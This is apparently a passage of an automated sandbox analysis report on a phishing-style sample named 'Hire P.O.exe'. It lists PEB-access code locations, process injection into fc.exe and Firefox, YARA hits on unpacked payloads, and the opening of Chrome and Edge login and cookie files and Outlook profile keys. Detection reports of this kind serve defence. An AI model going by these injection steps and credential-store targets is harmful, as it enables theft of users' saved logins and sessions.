                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01140946 mov eax, dword ptr fs:[00000030h]5_2_01140946
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114C97C mov eax, dword ptr fs:[00000030h]5_2_0114C97C
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E6962 mov eax, dword ptr fs:[00000030h]5_2_010E6962
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E6962 mov eax, dword ptr fs:[00000030h]5_2_010E6962
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E6962 mov eax, dword ptr fs:[00000030h]5_2_010E6962
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01164978 mov eax, dword ptr fs:[00000030h]5_2_01164978
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01164978 mov eax, dword ptr fs:[00000030h]5_2_01164978
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0110096E mov eax, dword ptr fs:[00000030h]5_2_0110096E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0110096E mov edx, dword ptr fs:[00000030h]5_2_0110096E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0110096E mov eax, dword ptr fs:[00000030h]5_2_0110096E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C09AD mov eax, dword ptr fs:[00000030h]5_2_010C09AD
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C09AD mov eax, dword ptr fs:[00000030h]5_2_010C09AD
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011489B3 mov esi, dword ptr fs:[00000030h]5_2_011489B3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011489B3 mov eax, dword ptr fs:[00000030h]5_2_011489B3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011489B3 mov eax, dword ptr fs:[00000030h]5_2_011489B3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D29A0 mov eax, dword ptr fs:[00000030h]5_2_010D29A0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118A9D3 mov eax, dword ptr fs:[00000030h]5_2_0118A9D3
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_011569C0 mov eax, dword ptr fs:[00000030h]5_2_011569C0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CA9D0 mov eax, dword ptr fs:[00000030h]5_2_010CA9D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CA9D0 mov eax, dword ptr fs:[00000030h]5_2_010CA9D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CA9D0 mov eax, dword ptr fs:[00000030h]5_2_010CA9D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CA9D0 mov eax, dword ptr fs:[00000030h]5_2_010CA9D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CA9D0 mov eax, dword ptr fs:[00000030h]5_2_010CA9D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CA9D0 mov eax, dword ptr fs:[00000030h]5_2_010CA9D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F49D0 mov eax, dword ptr fs:[00000030h]5_2_010F49D0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114E9E0 mov eax, dword ptr fs:[00000030h]5_2_0114E9E0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F29F9 mov eax, dword ptr fs:[00000030h]5_2_010F29F9
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F29F9 mov eax, dword ptr fs:[00000030h]5_2_010F29F9
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114C810 mov eax, dword ptr fs:[00000030h]5_2_0114C810
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116483A mov eax, dword ptr fs:[00000030h]5_2_0116483A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116483A mov eax, dword ptr fs:[00000030h]5_2_0116483A
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2835 mov eax, dword ptr fs:[00000030h]5_2_010E2835
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2835 mov eax, dword ptr fs:[00000030h]5_2_010E2835
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2835 mov eax, dword ptr fs:[00000030h]5_2_010E2835
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2835 mov ecx, dword ptr fs:[00000030h]5_2_010E2835
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2835 mov eax, dword ptr fs:[00000030h]5_2_010E2835
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E2835 mov eax, dword ptr fs:[00000030h]5_2_010E2835
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FA830 mov eax, dword ptr fs:[00000030h]5_2_010FA830
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D2840 mov ecx, dword ptr fs:[00000030h]5_2_010D2840
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C4859 mov eax, dword ptr fs:[00000030h]5_2_010C4859
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C4859 mov eax, dword ptr fs:[00000030h]5_2_010C4859
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F0854 mov eax, dword ptr fs:[00000030h]5_2_010F0854
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01156870 mov eax, dword ptr fs:[00000030h]5_2_01156870
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01156870 mov eax, dword ptr fs:[00000030h]5_2_01156870
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114E872 mov eax, dword ptr fs:[00000030h]5_2_0114E872
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114E872 mov eax, dword ptr fs:[00000030h]5_2_0114E872
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114C89D mov eax, dword ptr fs:[00000030h]5_2_0114C89D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0887 mov eax, dword ptr fs:[00000030h]5_2_010C0887
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EE8C0 mov eax, dword ptr fs:[00000030h]5_2_010EE8C0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FC8F9 mov eax, dword ptr fs:[00000030h]5_2_010FC8F9
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FC8F9 mov eax, dword ptr fs:[00000030h]5_2_010FC8F9
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118A8E4 mov eax, dword ptr fs:[00000030h]5_2_0118A8E4
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113EB1D mov eax, dword ptr fs:[00000030h]5_2_0113EB1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EEB20 mov eax, dword ptr fs:[00000030h]5_2_010EEB20
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EEB20 mov eax, dword ptr fs:[00000030h]5_2_010EEB20
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01188B28 mov eax, dword ptr fs:[00000030h]5_2_01188B28
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01188B28 mov eax, dword ptr fs:[00000030h]5_2_01188B28
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01168B42 mov eax, dword ptr fs:[00000030h]5_2_01168B42
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01156B40 mov eax, dword ptr fs:[00000030h]5_2_01156B40
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01156B40 mov eax, dword ptr fs:[00000030h]5_2_01156B40
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0118AB40 mov eax, dword ptr fs:[00000030h]5_2_0118AB40
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010BCB7E mov eax, dword ptr fs:[00000030h]5_2_010BCB7E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0BBE mov eax, dword ptr fs:[00000030h]5_2_010D0BBE
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0BBE mov eax, dword ptr fs:[00000030h]5_2_010D0BBE
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0BCD mov eax, dword ptr fs:[00000030h]5_2_010C0BCD
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0BCD mov eax, dword ptr fs:[00000030h]5_2_010C0BCD
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0BCD mov eax, dword ptr fs:[00000030h]5_2_010C0BCD
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E0BCB mov eax, dword ptr fs:[00000030h]5_2_010E0BCB
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E0BCB mov eax, dword ptr fs:[00000030h]5_2_010E0BCB
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E0BCB mov eax, dword ptr fs:[00000030h]5_2_010E0BCB
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0116EBD0 mov eax, dword ptr fs:[00000030h]5_2_0116EBD0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114CBF0 mov eax, dword ptr fs:[00000030h]5_2_0114CBF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EEBFC mov eax, dword ptr fs:[00000030h]5_2_010EEBFC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8BF0 mov eax, dword ptr fs:[00000030h]5_2_010C8BF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8BF0 mov eax, dword ptr fs:[00000030h]5_2_010C8BF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8BF0 mov eax, dword ptr fs:[00000030h]5_2_010C8BF0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0114CA11 mov eax, dword ptr fs:[00000030h]5_2_0114CA11
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010EEA2E mov eax, dword ptr fs:[00000030h]5_2_010EEA2E
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCA24 mov eax, dword ptr fs:[00000030h]5_2_010FCA24
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCA38 mov eax, dword ptr fs:[00000030h]5_2_010FCA38
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E4A35 mov eax, dword ptr fs:[00000030h]5_2_010E4A35
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010E4A35 mov eax, dword ptr fs:[00000030h]5_2_010E4A35
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0A5B mov eax, dword ptr fs:[00000030h]5_2_010D0A5B
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010D0A5B mov eax, dword ptr fs:[00000030h]5_2_010D0A5B
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C6A50 mov eax, dword ptr fs:[00000030h]5_2_010C6A50
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCA6F mov eax, dword ptr fs:[00000030h]5_2_010FCA6F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCA6F mov eax, dword ptr fs:[00000030h]5_2_010FCA6F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FCA6F mov eax, dword ptr fs:[00000030h]5_2_010FCA6F
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113CA72 mov eax, dword ptr fs:[00000030h]5_2_0113CA72
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_0113CA72 mov eax, dword ptr fs:[00000030h]5_2_0113CA72
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010CEA80 mov eax, dword ptr fs:[00000030h]5_2_010CEA80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01194A80 mov eax, dword ptr fs:[00000030h]5_2_01194A80
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F8A90 mov edx, dword ptr fs:[00000030h]5_2_010F8A90
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8AA0 mov eax, dword ptr fs:[00000030h]5_2_010C8AA0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8AA0 mov eax, dword ptr fs:[00000030h]5_2_010C8AA0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01116AA4 mov eax, dword ptr fs:[00000030h]5_2_01116AA4
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C0AD0 mov eax, dword ptr fs:[00000030h]5_2_010C0AD0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01116ACC mov eax, dword ptr fs:[00000030h]5_2_01116ACC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01116ACC mov eax, dword ptr fs:[00000030h]5_2_01116ACC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01116ACC mov eax, dword ptr fs:[00000030h]5_2_01116ACC
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F4AD0 mov eax, dword ptr fs:[00000030h]5_2_010F4AD0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F4AD0 mov eax, dword ptr fs:[00000030h]5_2_010F4AD0
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FAAEE mov eax, dword ptr fs:[00000030h]5_2_010FAAEE
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010FAAEE mov eax, dword ptr fs:[00000030h]5_2_010FAAEE
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01178D10 mov eax, dword ptr fs:[00000030h]5_2_01178D10
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01178D10 mov eax, dword ptr fs:[00000030h]5_2_01178D10
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DAD00 mov eax, dword ptr fs:[00000030h]5_2_010DAD00
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DAD00 mov eax, dword ptr fs:[00000030h]5_2_010DAD00
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010DAD00 mov eax, dword ptr fs:[00000030h]5_2_010DAD00
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010F4D1D mov eax, dword ptr fs:[00000030h]5_2_010F4D1D
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010B6D10 mov eax, dword ptr fs:[00000030h]5_2_010B6D10
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010B6D10 mov eax, dword ptr fs:[00000030h]5_2_010B6D10
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010B6D10 mov eax, dword ptr fs:[00000030h]5_2_010B6D10
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_01148D20 mov eax, dword ptr fs:[00000030h]5_2_01148D20
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8D59 mov eax, dword ptr fs:[00000030h]5_2_010C8D59
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8D59 mov eax, dword ptr fs:[00000030h]5_2_010C8D59
                Source: C:\Users\user\Desktop\Hire P.O.exeCode function: 5_2_010C8D59 mov eax, dword ptr fs:[00000030h]5_2_010C8D59
                Source: C:\Users\user\Desktop\Hire P.O.exe; Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\Hire P.O.exe; Memory written: C:\Users\user\Desktop\Hire P.O.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\Hire P.O.exe; Section loaded: NULL target: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\Hire P.O.exe; Section loaded: NULL target: C:\Windows\SysWOW64\fc.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\fc.exe; Section loaded: NULL target: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe protection: read write
                Source: C:\Windows\SysWOW64\fc.exe; Section loaded: NULL target: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\fc.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\fc.exe; Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\fc.exe; Thread register set: target process: 1212
                Source: C:\Windows\SysWOW64\fc.exe; Thread APC queued: target process: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe
                Source: C:\Users\user\Desktop\Hire P.O.exe; Process created: C:\Users\user\Desktop\Hire P.O.exe "C:\Users\user\Desktop\Hire P.O.exe"
                Source: C:\Program Files (x86)\zwqvGPErmfVZhAyLajeqhtjLxCQQXKUzWeILiqBnoWgauaEwQqSQnC\zKwhguHavy.exe; Process created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
                Source: C:\Windows\SysWOW64\fc.exe; Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: zKwhguHavy.exe, 00000006.00000000.1786422892.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3140201922.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000000.1941848313.0000000000E60000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
                Source: zKwhguHavy.exe, 00000006.00000000.1786422892.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3140201922.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000000.1941848313.0000000000E60000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
                Source: zKwhguHavy.exe, 00000006.00000000.1786422892.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3140201922.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000000.1941848313.0000000000E60000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
                Source: zKwhguHavy.exe, 00000006.00000000.1786422892.0000000000E00000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 00000006.00000002.3140201922.0000000000E01000.00000002.00000001.00040000.00000000.sdmp, zKwhguHavy.exe, 0000000A.00000000.1941848313.0000000000E60000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: yProgram Manager
                Source: C:\Users\user\Desktop\Hire P.O.exe; Queries volume information: C:\Users\user\Desktop\Hire P.O.exe VolumeInformation
                Source: C:\Users\user\Desktop\Hire P.O.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\Hire P.O.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\Hire P.O.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\Hire P.O.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\Hire P.O.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\Hire P.O.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match; File source: 5.2.Hire P.O.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 5.2.Hire P.O.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.3142576469.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3140780162.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3140728929.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.1863818446.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.1865405800.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\fc.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match; File source: 5.2.Hire P.O.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 5.2.Hire P.O.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000005.00000002.1863004368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 0000000A.00000002.3142576469.0000000004C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3140780162.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3140728929.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.1863818446.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000007.00000002.3139030959.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.3140644912.00000000024D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.1865405800.0000000001550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
